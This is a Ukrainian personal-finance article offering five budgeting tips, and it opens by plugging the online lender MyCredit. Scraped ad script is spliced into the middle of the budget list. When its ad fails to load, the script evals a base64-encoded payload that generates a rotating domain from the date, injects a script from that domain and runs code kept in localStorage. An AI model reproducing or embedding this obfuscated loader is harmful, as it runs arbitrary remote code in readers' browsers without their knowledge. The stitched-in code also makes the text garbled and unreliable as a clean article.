Більшість українців звикли жити за принципом “від получки до получки”. Зарплатний день — щасливий день, чи не так? Але вона так швидко закінчується! І ось до наступної зарплати лишається тиждень, а грошей уже катма. Якщо це разова ситуація, можна взяти швидку позику онлайн на фінансовому сервісі https://mycredit.ua/ua/uslugi-kreditovaniya/kredit-onlajn-na-kartu/. Але що як вона повторюється знову й знову? І ви вже не знаєте, як розірвати це коло з безкінечних кредитів?
Схоже, ваші доходи менші за витрати. Що з цим робити? За логікою, потрібно або нарощувати перші, або скорочувати другі. Ось, з чого ми радить почати сервіс Майкредіт:
1. Розрахуйтеся з боргами
Неможливо стати забезпеченою людиною, перебуваючи по вуха в боргах. Вони — та гиря, що завжди заважатиме рухатися вперед. Тож виплата відкритих кредитів має бути першим пунктом у переліку витрат.
Як це зробити? Завжди намагайтеся виплачувати трохи більше за обов’язковий платіж, щоб швидше розрахуватися і менше переплатити. У вас невигідна процентна ставка? Тримайте “руку на пульсі” і постійно відслідковуйте ринок. Можливо, вдасться погасити один кредит іншим з нижчою процентною ставкою?
2. Намагайтеся витрачати менше, ніж отримуєте
Скоротити витрати на комуналку допоможе субсидія. Перевірте, можливо, ваша сім’я має право на неї.
Не поспішайте викидати чеки із супермаркетів. Назбирайте за місяць і перевірте, що з витраченого було зайвим?
Скоротіть витрати на транспорт. Враховуючи вартість пального, не лише таксі, а й автобуси та маршрутки перестали бути бюджетним варіантом. Пересядьте на електричку. Вона довше їде, але цей час можна використовувати з користю, наприклад, вивчаючи англійську.
Щодо харчування, ви й самі знаєте, де даєте слабину. Не можна економити на найнеобхіднішому. Але замінити фастфуд здоровою їжею — цілком у ваших силах. Почитайте фуд-блогерів, у них є чимало рецептів правильного харчування з дешевих продуктів.
3. Сплануйте бюджет
Правильно складений сімейний бюджет людини з низьким та середнім достатком виглядає приблизно так:
Оренда і комуналка — 30% від доходів. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Їжа — 25%.
Транспорт — 5%.
Навчання, підвищення кваліфікації, спорт тощо — 10%.
Розваги — 5%.
Боргові розрахунки — 15%.
“Заначка” — 10%.
4. Підвищуйте дохід
Більшість із нас не вміють правильно просити підвищення зарплати. Між тим, це дуже корисна навичка. Чекати ж, коли керівник сам згадає та гідно оцінить вашу працю можна дуже довго (підказка: і марно). Тож, якщо маєте хороший досвід і навички, ваша зарплата має бути, як мінімум, середньоринковою по галузі, але, аж ніяк, не нижчою.
5. Завжди відкладайте “про запас”
Навіть якщо “фінанси співають романси”, не забувайте про створення “подушки безпеки” — ніколи не знаєш, коли вона може знадобитися. Наприклад, відмовтеся від ранкової кави та задонатьте в своє майбутнє. Тільки гроші краще відкладати зразу, для цього створіть окремий депозитний рахунок у банківському додатку.
Не лінуйтеся фіксувати свої доходи й витрати — в блокноті або скачавши спеціальний додаток на смартфон. Це допоможе керувати рухом коштів більш якісно. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/vitrachayemo-groshi-pravilno-5-porad-dlya-rozumnogo-keruvannya-byudzhetom/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook